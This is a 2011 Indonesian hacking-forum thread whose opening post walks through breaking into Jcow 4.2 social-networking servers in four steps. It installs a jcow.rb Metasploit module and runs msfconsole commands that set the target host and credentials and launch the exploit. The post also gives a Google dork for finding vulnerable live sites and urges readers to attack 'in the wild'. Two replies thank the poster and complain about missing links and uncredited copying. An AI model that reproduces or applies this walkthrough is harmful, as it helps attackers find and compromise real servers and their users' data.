.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 4 Langkah Hacking Kedalam Jcow Social Networking Web Server

Go down 
3 posters
PengirimMessage
dark_kiddy
VIP Member
VIP Member
dark_kiddy


Jumlah posting : 176
Points : 229
Reputation : 6
Join date : 24.10.11
Age : 34
Lokasi : Makassar

4 Langkah Hacking Kedalam Jcow Social Networking Web Server Empty
PostSubyek: 4 Langkah Hacking Kedalam Jcow Social Networking Web Server   4 Langkah Hacking Kedalam Jcow Social Networking Web Server Icon_minitimeMon Nov 21, 2011 2:44 pm

sedang asik2 googling...!! eh dapat ilmu dari tetangga sebelah nich... share dlu yach...!!! 4 Langkah Hacking Kedalam Jcow Social Networking Web Server 3529815765

Apakah teman-teman di BC pernah melihat CMS yang satu ini?
Jcow social networking...Ya, memang demikian namanya...Jcow menawarkan aplikasi berbasis web untuk situs jejaring sosial secara gratis alias free dan bisa dilihat di websitenya jcow.net dengan ukuran file yang cukup kecil hanya 777KB tidak lebih dari 1MB.

Tapi disini yang akan saya bahas bukanlah mengenai penggunaan dari si Jcow ini sebagai situs pertemanan, melainkan terdapatnya suatu vulnerability dari beberapa versi dari Jcow yang ternyata dapat disusupi hanya dalam 4 langkah , dan bahkan si penyusup dapat melihat isi direktori web server korban(jika ternyata servernya pun tidak menerapkan pengamanan yang baik).

Pada contoh yang akan saya buat dibawah ini, korban menggunakan IP : 192.168.8.94...
Jauh lebih baik kalau kawan-kawan mau belajar menggunakan virtual lab terlebih dahulu, tapi kalau ternyata penasaran ingin langsung to the wild arena, kawan-kawan juga bisa cari via google dork : "Powered by Jcow 4.2.0". Jika tertarik untuk langsung ke dunia nyata, kawan-kawan juga harus mempelajari logika dari teknik penyerangan via internet(klik disini)

O.S Penyerang : BT 5 R1
O.S Korban : XP SP3
Aplikasi vulnerable : Jcow 4.2

Pada artikel ini juga saya sebelumnya sudah membuat username : "victim dan password :"victim" pada aplikasi Jcow target.

Oke kita mulai langkah demi langkahnya dibawah ini

Kebutuhan :
1. Metasploit Framework (metasploit.com)
2. Script exploit jcow.rb(link mediafire di website asalnya)

Langkah-Langkahnya :
1. Copykan file exploit jcow.rb yang sudah di-download kedalam folder /pentest/exploits/framework/modules/exploits/remote/

cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/

Jika bingung bagaimana cara meng-copy kan file exploit.rb kedalam Backtrack Linux, kawan-kawan bisa lihat tutorialnya disini.

2. Buka metasploit console dengan mengetikkan msfconsole pada terminal, lalu gunakan exploit yang sebelumnya sudah kita copy tadi.

msf > use exploit/remote/jcow

3. Selanjutnya ketikkan perintah show options untuk melihat switch apa saja yang dapat digunakan untuk exploit ini.

[You must be registered and logged in to see this image.]

msf exploit(jcow) > set rhost 192.168.8.94 --> target IP
rhost => 192.168.8.94
msf exploit(jcow) > set username victim --> set username
username => victim
msf exploit(jcow) > set password victim --> set password
password => victim

4. Yep setelah semuanya selesai dikonfigurasi dengan baik, langkah terakhir tinggal menjalankan perintah exploit pada konsol metasploit.

[You must be registered and logged in to see this image.]

Berhasil :mfun:

Pengamanan :
1. Upgrade Jcow ke versi terbaru
Kembali Ke Atas Go down
pradda
NuuBiiTooL
NuuBiiTooL
pradda


Jumlah posting : 20
Points : 22
Reputation : 0
Join date : 06.10.11
Age : 34
Lokasi : di dalam monitor

4 Langkah Hacking Kedalam Jcow Social Networking Web Server Empty
PostSubyek: Re: 4 Langkah Hacking Kedalam Jcow Social Networking Web Server   4 Langkah Hacking Kedalam Jcow Social Networking Web Server Icon_minitimeWed Nov 23, 2011 10:00 pm

wew :mewek makasih kk , izin sedot ya kk?? :alay:
Kembali Ke Atas Go down
http://devill.pradda.us/
nesta
VIP Member
VIP Member
nesta


Jumlah posting : 810
Points : 896
Reputation : 42
Join date : 04.08.11
Age : 37
Lokasi : depan komputer

4 Langkah Hacking Kedalam Jcow Social Networking Web Server Empty
PostSubyek: Re: 4 Langkah Hacking Kedalam Jcow Social Networking Web Server   4 Langkah Hacking Kedalam Jcow Social Networking Web Server Icon_minitimeWed Nov 23, 2011 10:44 pm

-> 2. Script exploit jcow.rb(link mediafire di website asalnya) <- itu dimana ya?
-> Jika bingung bagaimana cara meng-copy kan file exploit.rb kedalam Backtrack Linux, kawan-kawan bisa lihat tutorialnya disini. <- disini dimana bro?

kalo copas sertakan sumbernya, ketahuan yang buat ntar kenak imbas juga ne forum 4 Langkah Hacking Kedalam Jcow Social Networking Web Server 1082720249 4 Langkah Hacking Kedalam Jcow Social Networking Web Server 1082720249 4 Langkah Hacking Kedalam Jcow Social Networking Web Server 1082720249 4 Langkah Hacking Kedalam Jcow Social Networking Web Server 1082720249 4 Langkah Hacking Kedalam Jcow Social Networking Web Server 1082720249
Kembali Ke Atas Go down
http://www.hacker-newbie.org
Sponsored content





4 Langkah Hacking Kedalam Jcow Social Networking Web Server Empty
PostSubyek: Re: 4 Langkah Hacking Kedalam Jcow Social Networking Web Server   4 Langkah Hacking Kedalam Jcow Social Networking Web Server Icon_minitime

Kembali Ke Atas Go down
 
4 Langkah Hacking Kedalam Jcow Social Networking Web Server
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Web attack-
Navigasi: